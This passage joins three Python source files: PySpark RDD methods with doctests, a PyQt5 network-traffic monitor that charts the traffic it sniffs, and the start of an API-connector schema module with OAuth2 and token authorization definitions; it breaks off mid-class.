def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
        first element in each RDD, the second element in each RDD, and so on. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
        # The JVM will raise an exception if the partitions contain different
        # numbers of items.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
        more than one partition.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
        It will convert each Python object into a Java object by Pyrolite, whether the
        RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self):
"""
.. note:: Experimental
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
:return: an :class:`RDDBarrier` instance that provides actions within a barrier stage.
.. seealso:: :class:`BarrierTaskContext`
.. seealso:: `SPIP: Barrier Execution Mode
<http://jira.apache.org/jira/browse/SPARK-24374>`_
.. seealso:: `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
.. versionadded:: 2.4.0
"""
return RDDBarrier(self)
def _is_barrier(self):
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
        # The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class RDDBarrier(object):
"""
.. note:: Experimental
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
"""
def __init__(self, rdd):
self.rdd = rdd
def mapPartitions(self, f, preservesPartitioning=False):
"""
.. note:: Experimental
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
"""
def func(s, iterator):
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
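    # Illustrative usage (an assumption, not taken from the original docstring): a barrier
    # stage is entered via RDD.barrier(), e.g. with a local SparkContext `sc`:
    #
    #   >>> rdd = sc.parallelize(range(4), 2)
    #   >>> rdd.barrier().mapPartitions(lambda it: [sum(it)]).collect()
    #   [1, 5]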
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False, isFromBarrier=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = prev._is_barrier() or isFromBarrier
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning, self.is_barrier)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
network_monitor_4.1beta.py
# -*- coding: utf-8 -*-
from PyQt5.QtWidgets import * # PyQt5
from PyQt5.QtCore import QThread, pyqtSignal, Qt  # threading and cross-thread signalling
from PyQt5.QtChart import QChartView, QChart, QBarSet, QHorizontalBarSeries, QBarCategoryAxis
from network_monitor_no_gui import *
from ui_Main_Window import *  # main window exported from the Qt Designer .ui file
import multiprocessing
SNIFF_INTERVAL = 0.5  # duration of one capture round, in seconds
PLOT_NUMBER = 5  # number of groups drawn on one chart
# Scale a value into a suitable unit
def speed2str(speed):
unit = ['', 'K', 'M', 'G', 'T']
_i = 0
while speed >= 1000:
speed /= 1024
_i = _i + 1
base = pow(1024, _i)
return unit[_i], base
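# Illustrative example: speed2str(3_500_000) returns ('M', 1048576), so the caller can
# display 3_500_000 / 1048576 ≈ 3.34 together with the 'M' unit prefix.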
# Traffic statistics chart
class FlowChart(QChart):
def __init__(self, main_ui):
super(QChart, self).__init__()
self.main_ui = main_ui
        # set the title
        # self.setTitle('Simple horizontal barchart example')
        # enable animations
        # self.setAnimationOptions(QChart.SeriesAnimations)
width = self.main_ui.graphics_view.width()
height = self.main_ui.graphics_view.height()
self.resize(width, height)
def draw(self):
        # determine the plot options from the radio-button state in the UI
if self.main_ui.radio_ip.isChecked():
plotCategory = 'IP'
else:
plotCategory = 'protocol'
if self.main_ui.radio_packet.isChecked():
plotUnit = 'packet'
else:
plotUnit = 'length'
        # adjust the SQL query according to the selected options
sql = '''
SELECT {0}, upload_{1} AS upload, download_{1} AS download
FROM network_monitor.{0}_upload_download
ORDER BY all_{1} DESC
LIMIT {2};'''
sql = sql.format(plotCategory, plotUnit, PLOT_NUMBER)
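        # For example, with the 'IP' and 'length' radio buttons selected and PLOT_NUMBER = 5,
        # the rendered query becomes:
        #   SELECT IP, upload_length AS upload, download_length AS download
        #   FROM network_monitor.IP_upload_download
        #   ORDER BY all_length DESC
        #   LIMIT 5;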
        sql_values = run_sql_with_result(sql)  # the query result is a list of dicts
        try:
            sql_values.reverse()  # raises if sql_values is empty or None
        except Exception:
            self.removeAllSeries()  # remove any previously drawn series
            return
        if plotUnit == 'length':  # when plotting by byte size, rescale the values into a readable unit
max_value = 0
for i in sql_values:
for j in ['download', 'upload']:
max_value = max(max_value, i[j])
(unit, base) = speed2str(max_value)
for i in sql_values:
for j in ['download', 'upload']:
i[j] /= base
unit_str = ',单位:' + unit + 'B'
else:
unit_str = ',单位:包'
        # create two bars per group
        set0 = QBarSet('下载' + unit_str)
        set1 = QBarSet('上传' + unit_str)
        for i in range(len(sql_values)):  # PyQt appends data with the << operator, following C++ Qt
set0 << sql_values[i]['download']
set1 << sql_values[i]['upload']
        # create the horizontal bar series
series = QHorizontalBarSeries()
series.append(set0)
series.append(set1)
        # add the series to the chart
self.removeAllSeries()
self.addSeries(series)
        # bar categories
        categories = [x[plotCategory] for x in sql_values]
        # category x axis; note that in a horizontal bar chart the x axis is the vertical one
        axis = QBarCategoryAxis()
        axis.append(categories)
        # create the default axes
        self.createDefaultAxes()
        # replace the default y axis with the category axis
        self.setAxisY(axis, series)
        # show the legend
self.legend().setVisible(True)
self.legend().setAlignment(Qt.AlignBottom)
def update(self):
        # resize the chart to match the enclosing graphics_view
width = self.main_ui.graphics_view.width() - 10
height = self.main_ui.graphics_view.height() - 10
# self.main_ui.graphics_view.setSceneRect(self.main_ui.graphics_scene.sceneRect())
# self.main_ui.graphics_scene.setSceneRect(self.main_ui.graphics_view.sceneRect())
self.resize(width, height)
self.draw()
def sniffProcess(q, iface):
packets = sniff(iface=iface, timeout=SNIFF_INTERVAL)
packet_length = data_process(packets)
    q.put(packet_length)  # processes exchange data through a multiprocessing.Queue
# Core worker thread: drives the capture process and the data processing
class CoreThread(QThread):
trigger = pyqtSignal(int)
    # constructor
def __init__(self, main_ui):
super(CoreThread, self).__init__()
self.main_ui = main_ui
self.iface = ''
self.userIP = ''
self.sniff_thread = None
self.data_process_thread = None
self.plot_thread = None
self.trigger.connect(self.main_ui.update_plot)
    # override the thread's run() method
def run(self):
        # initialize the database
        # init_database(self.userIP)
        # plt.ion()
        while True:
            # check whether the monitored interface changed; if so, (re)initialize the database
network_info_str = self.main_ui.combo_interface.currentText()
network_info = network_info_str.strip('][').replace('\'', '').split(', ')
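            # e.g. a combo-box entry such as "['eth0', '192.168.1.5']" (illustrative values)
            # is parsed back into the list ['eth0', '192.168.1.5']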
if network_info[0] != self.iface:
self.iface = network_info[0]
self.userIP = network_info[1]
init_database(self.userIP)
queue = multiprocessing.Queue()
process = multiprocessing.Process(target=sniffProcess, args=(queue, self.iface))
process.start()
            # queue.get() blocks until the sniff process has put its result
            self.trigger.emit(queue.get())
            process.join()
            time.sleep(SNIFF_INTERVAL)
# Qt main window UI
class NetworkMonitorMainUI(QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(NetworkMonitorMainUI, self).__init__(parent)
self.setupUi(self)
self.chart = FlowChart(self)
print("hello")
        # signals and slots for the four radio buttons: connect each click to its handler
self.radio_ip.clicked.connect(self.radio_button_ip_click)
self.radio_protocol.clicked.connect(self.radio_button_protocol_click)
self.radio_packet.clicked.connect(self.radio_button_packet_click)
self.radio_length.clicked.connect(self.radio_button_length_click)
        # populate the drop-down menu for selecting the network interface
for i in get_network_info():
self.combo_interface.addItem(str(i))
        # create and start the core thread
self.core_thread = CoreThread(self)
self.core_thread.start()
        # In Qt, graphics_view is a widget;
        # the graphics_view hosts a graphics_scene,
        # and the graphics_scene hosts a widget such as a QChart
self.graphics_scene = QGraphicsScene()
# self.graphics_scene.setMinimumRenderSize(3)
# scene.setSceneRect(self.graphics_view.sceneRect())
self.graphics_scene.addItem(self.chart)
self.graphics_view.setScene(self.graphics_scene)
    # the four handlers triggered by clicking the corresponding radio buttons
def radio_button_ip_click(self):
        self.radio_protocol.setChecked(False)  # uncheck the other button in the pair
def radio_button_protocol_click(self):
self.radio_ip.setChecked(False)
def radio_button_packet_click(self):
self.radio_length.setChecked(False)
def radio_button_length_click(self):
self.radio_packet.setChecked(False)
def update_plot(self, packet_length):
        # display the current speed
current_net_speed = packet_length / SNIFF_INTERVAL
(unit_str, base) = speed2str(current_net_speed)
current_net_speed /= base
current_net_speed_str = '当前速度:' + '%.2f' % current_net_speed + unit_str + 'B/s'
self.netspeed_label.setText(current_net_speed_str)
        # refresh the chart
self.chart.update()
if __name__ == '__main__':
app = QApplication(sys.argv)
main_ui = NetworkMonitorMainUI()
main_ui.show()
sys.exit(app.exec_())
defs.py
"""Strong typed schema definition."""
import http.server
import json
import random
import re
import socket
import socketserver
import string
from base64 import b64encode
from enum import Enum
from pathlib import Path
from threading import Thread
from time import time
from typing import Any, Dict, List, Optional, Set, Union
from urllib.parse import parse_qs, urlparse
from jinja2 import Environment, meta
from pydantic import Field, root_validator
from ...utils import is_notebook
from ..errors import InvalidAuthParams, MissingRequiredAuthParams
from ..utils import Request
from .base import BaseDef, BaseDefT
# pylint: disable=missing-class-docstring,missing-function-docstring,invalid-name
FILE_PATH: Path = Path(__file__).resolve().parent
with open(f"{FILE_PATH}/oauth2.html", "rb") as f:
OAUTH2_TEMPLATE = f.read()
def get_random_string(length: int) -> str:
letters = string.ascii_lowercase
result_str = "".join(random.choice(letters) for _ in range(length))
return result_str
def validate_auth(required: Set[str], passed: Dict[str, Any]) -> None:
required_not_passed = required - passed.keys()
passed_not_required = passed.keys() - required
if required_not_passed:
raise MissingRequiredAuthParams(required_not_passed)
if passed_not_required:
raise InvalidAuthParams(passed_not_required)
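# Illustrative example: validate_auth({"client_id", "client_secret"}, {"client_id": "x"})
# raises MissingRequiredAuthParams (client_secret is missing), while passing an unexpected
# key such as "token" raises InvalidAuthParams instead.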
class OffsetPaginationDef(BaseDef):
type: str = Field("offset", const=True)
max_count: int
limit_key: str
offset_key: str
class SeekPaginationDef(BaseDef):
type: str = Field("seek", const=True)
max_count: int
limit_key: str
seek_id: str
seek_key: str
class PagePaginationDef(BaseDef):
type: str = Field("page", const=True)
max_count: int
limit_key: str
page_key: str
class TokenLocation(str, Enum):
Header = "header"
Body = "body"
class TokenPaginationDef(BaseDef):
type: str = Field("token", const=True)
max_count: int
limit_key: str
token_location: TokenLocation
token_accessor: str
token_key: str
PaginationDef = Union[OffsetPaginationDef, SeekPaginationDef, PagePaginationDef, TokenPaginationDef]
class FieldDef(BaseDef):
required: bool
from_key: Union[List[str], str, None]
to_key: Optional[str]
template: Optional[str]
remove_if_empty: bool
@root_validator(pre=True)
# pylint: disable=no-self-argument,no-self-use
def from_key_validation(cls, values: Dict[str, Any]) -> Any:
if "template" in values:
parsed_content = Environment().parse(values["template"])
variables = meta.find_undeclared_variables(parsed_content) # type: ignore
from_key = values.get("fromKey")
if isinstance(from_key, str):
from_key = {from_key}
elif from_key is None:
from_key = set()
elif isinstance(from_key, list):
from_key = set(from_key)
else:
raise NotImplementedError("Unreachable")
if len(set(variables) - from_key) != 0:
raise ValueError(f"template requires {variables} exist in fromKey, got {from_key}")
else:
if isinstance(values.get("fromKey"), list):
raise ValueError("from_key cannot be a list if template is not used.")
return values
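# Illustrative example for the validator above: a FieldDef whose template is
# "{{ first }} {{ last }}" must list both variables in fromKey, e.g. fromKey=["first", "last"];
# without a template, fromKey may only be a single key or None.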
FieldDefUnion = Union[FieldDef, bool, str] # Put bool before str
class TCPServer(socketserver.TCPServer):
def server_bind(self) -> None:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class HTTPServer(http.server.BaseHTTPRequestHandler):
def do_GET(self) -> None: # pylint: disable=invalid-name
# pylint: disable=protected-access
query = urlparse(self.path).query
parsed = parse_qs(query)
(code,) = parsed["code"]
(state,) = parsed["state"]
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(OAUTH2_TEMPLATE)
Thread(target=self.server.shutdown).start()
# Hacky way to pass data out
self.server._oauth2_code = code # type: ignore
self.server._oauth2_state = state # type: ignore
def log_request(self, code: Union[str, int] = "-", size: Union[str, int] = "-") -> None:
pass
class OAuth2AuthorizationCodeAuthorizationDef(BaseDef):
type: str = Field("OAuth2", const=True)
grant_type: str = Field("AuthorizationCode", const=True)
scopes: List[str]
auth_server_url: str
token_server_url: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None,
) -> None:
if storage is None:
raise ValueError("storage is required for OAuth2")
if "access_token" not in storage or storage.get("expires_at", 0) < time():
port = params.get("port", 9999)
code = self._auth(params["client_id"], port)
validate_auth({"client_id", "client_secret"}, params)
ckey = params["client_id"]
csecret = params["client_secret"]
b64cred = b64encode(f"{ckey}:{csecret}".encode("ascii")).decode()
headers = {
"Authorization": f"Basic {b64cred}",
"Content-Type": "application/x-www-form-urlencoded",
}
params = {
"grant_type": "authorization_code",
"code": code,
"redirect_uri": f"http://localhost:{port}/",
}
requests = Request(self.token_server_url)
response = requests.post(_headers=headers, _data=params)
resp: Dict[str, Any] = json.loads(response.read())
if resp["token_type"].lower() != "bearer":
raise RuntimeError("token_type is not bearer")
access_token = resp["access_token"]
storage["access_token"] = access_token
if "expires_in" in resp:
storage["expires_at"] = (
time() + resp["expires_in"] - 60
) # 60 seconds grace period to avoid clock lag
req_data["headers"]["Authorization"] = f"Bearer {storage['access_token']}"
def _auth(self, client_id: str, port: int = 9999) -> str:
# pylint: disable=protected-access
state = get_random_string(23)
scope = ",".join(self.scopes)
authurl = (
f"{self.auth_server_url}?"
f"response_type=code&client_id={client_id}&"
f"redirect_uri=http%3A%2F%2Flocalhost:{port}/&scope={scope}&"
f"state={state}"
)
if is_notebook():
from IPython.display import ( # pylint: disable=import-outside-toplevel
Javascript,
display,
)
display(Javascript(f"window.open('{authurl}');"))
else:
import webbrowser # pylint: disable=import-outside-toplevel
webbrowser.open_new_tab(authurl)
        with TCPServer(("", port), HTTPServer) as httpd:
try:
httpd.serve_forever()
finally:
httpd.server_close()
if httpd._oauth2_state != state: # type: ignore
raise RuntimeError("OAuth2 state does not match")
if httpd._oauth2_code is None: # type: ignore
raise RuntimeError("OAuth2 authorization code auth failed, no code acquired.")
return httpd._oauth2_code # type: ignore
class OAuth2ClientCredentialsAuthorizationDef(BaseDef):
type: str = Field("OAuth2", const=True)
grant_type: str = Field("ClientCredentials", const=True)
token_server_url: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None,
) -> None:
if storage is None:
raise ValueError("storage is required for OAuth2")
if "access_token" not in storage or storage.get("expires_at", 0) < time():
validate_auth({"client_id", "client_secret"}, params)
# Not yet authorized
ckey = params["client_id"]
csecret = params["client_secret"]
b64cred = b64encode(f"{ckey}:{csecret}".encode("ascii")).decode()
headers = {
"Authorization": f"Basic {b64cred}",
"Content-Type": "application/x-www-form-urlencoded",
}
params = {"grant_type": "client_credentials"}
requests = Request(self.token_server_url)
response = requests.post(_headers=headers, _data=params)
resp: Dict[str, Any] = json.loads(response.read())
if resp["token_type"].lower() != "bearer":
raise RuntimeError("token_type is not bearer")
access_token = resp["access_token"]
storage["access_token"] = access_token
if "expires_in" in resp:
storage["expires_at"] = (
time() + resp["expires_in"] - 60
) # 60 seconds grace period to avoid clock lag
req_data["headers"]["Authorization"] = f"Bearer {storage['access_token']}"
class QueryParamAuthorizationDef(BaseDef):
type: str = Field("QueryParam", const=True)
key_param: str
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["params"][self.key_param] = params["access_token"]
class BearerAuthorizationDef(BaseDef):
type: str = Field("Bearer", const=True)
@staticmethod
def build(
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["headers"]["Authorization"] = f"Bearer {params['access_token']}"
class HeaderAuthorizationDef(BaseDef):
type: str = Field("Header", const=True)
key_name: str
extra: Dict[str, str] = Field(default_factory=dict)
def build(
self,
req_data: Dict[str, Any],
params: Dict[str, Any],
storage: Optional[Dict[str, Any]] = None, # pylint: disable=unused-argument
) -> None:
"""Populate some required fields to the request data."""
validate_auth({"access_token"}, params)
req_data["headers"][self.key_name] = params["access_token"]
req_data["headers"].update(self.extra)
AuthorizationDef = Union[
OAuth2ClientCredentialsAuthorizationDef,
OAuth2AuthorizationCodeAuthorizationDef,
QueryParamAuthorizationDef,
BearerAuthorizationDef,
HeaderAuthorizationDef,
]
class BodyDef(BaseDef):
ctype: str = Field(regex=r"^(application/x-www-form-urlencoded|application/json)$")
content: Dict[str, FieldDefUnion]
class Method(str, Enum):
GET = "GET"
POST = "POST"
PUT = "PUT"
class SearchDef(BaseDef):
key: str
class UrlDef(BaseDef):
url: str
parse: bool = True
skip: Set[str] = Field(default_factory=set)
class RequestDef(BaseDef):
url: Union[str, UrlDef]
method: Method
headers: Optional[Dict[str, FieldDefUnion]]
params: Dict[str, FieldDefUnion]
body: Optional[BodyDef]
cookies: Optional[Dict[str, FieldDefUnion]]
authorization: Optional[AuthorizationDef]
pagination: Optional[PaginationDef]
search: Optional[SearchDef]
def url_path_params(self) -> Set[str]:
